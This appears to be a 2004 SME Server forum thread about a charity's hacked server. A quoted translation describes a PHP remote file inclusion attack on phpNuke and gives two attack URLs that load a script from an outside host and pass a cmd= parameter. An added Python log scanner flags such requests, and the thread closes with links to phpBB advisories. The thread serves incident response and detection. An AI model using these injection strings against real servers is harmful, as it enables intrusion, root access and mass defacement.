Koozali.org: home of the SME Server
Legacy Forums => Experienced User Forum => Topic started by: raem on December 03, 2004, 03:39:55 AM
-
Dear All
It looks like a server I maintain for a charity group has been hacked ....
[moderated, original post received through security@contribs.org]
-
I'm sure that you probably posted this in haste, but please remember that this is a public forum.
security@contribs.org is a more appropriate place for this report.
-
Why is this topic censored?
A security breach needs to be widely known, as we need to know that it has happened and be ready to patch our servers as soon as a patch is available.
-
This is looking like a PHP security breach rather than an SME Server security breach, although not fully resolved as yet.
See (in Italian)
http://www.glesius.it/forum/topic.asp?TOPIC_ID=3457
part of which translates to:
The technical adopted that of using was a condenses from browser to
delimit a situation of injection php on the server and to earn the access
like root (director) and to load a script that carries out a mass defacement
to the index of the sites. [site + exploit + cmd=]. This technology was
carried out to one of the sites that presented the vulnerability to one of
the forms in phpnuke. They used one of the following strings:
www.sito.it/index.php?=http://dominus.webcindario.com/inf.jpg?&cmd=
www.sito.it//modules/My_eGallery/public/displayCategory.php?basepath=http://dominus.webcindario.com/inf.jpg?&cmd=
and also see these sites for an interesting read of text conversation between hacker and hacked.
http://xoomer.virgilio.it/gioxx85/deface/log.htm
Thanks to those who helped me, they know who they are.
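Added example, not part of the original post or of SME Server: a small check for web access logs that flags requests shaped like the strings quoted above, where a query parameter's value is itself a remote URL. It assumes Apache common/combined log format; the log lines, addresses and the host remote.example are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache common/combined log line: client IP, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+)[^"]*" (\d{3})')
# A query value that is itself a remote URL matches the request shape quoted above.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def query_pairs(target):
    """Split the request target at the first '?' and decode its parameters."""
    return parse_qsl(target.partition('?')[2], keep_blank_values=True)

def suspicious_params(target):
    """Names of parameters whose value decodes to a remote URL."""
    # parse_qsl decodes once; unquote again to catch double-encoded values.
    return [n for n, v in query_pairs(target) if REMOTE_RE.match(unquote(v))]

def scan(lines):
    """Return one finding per log line that carries a remote-URL parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        ip, _method, target, status = m.groups()
        params = suspicious_params(target)
        if params:
            has_cmd = any(n == "cmd" for n, _ in query_pairs(target))
            findings.append({"ip": ip, "status": int(status),
                             "params": params, "has_cmd": has_cmd})
    return findings

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE = [
    '192.0.2.10 - - [03/Dec/2004:03:12:01 +0000] "GET /index.php?page=news HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/Dec/2004:03:14:22 +0000] "GET //modules/My_eGallery/public/'
    'displayCategory.php?basepath=http://remote.example/inf.jpg?&cmd=id HTTP/1.0" 200 812',
    '198.51.100.7 - - [03/Dec/2004:03:14:40 +0000] "GET /index.php?'
    '=http%3A%2F%2Fremote.example%2Finf.jpg%3F&cmd= HTTP/1.0" 200 640',
    '203.0.113.5 - - [03/Dec/2004:03:20:00 +0000] "GET /redirect.php?next=/home HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Parameters that legitimately carry URLs will also match, so each finding is a lead to review against the script that handled the request, not a verdict.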
-
Just as a follow up for readers:
phpBB had a major security vulnerability which, in conjunction with a PHP vulnerability, allowed hackers to get root control.
See
http://www.phpbb.com/phpBB/viewtopic.php?t=241300&postdays=0&postorder=asc&start=0
and
http://www.phpbbstyles.com/viewtopic.php?t=1903
and
http://forums.contribs.org/index.php?topic=25275.0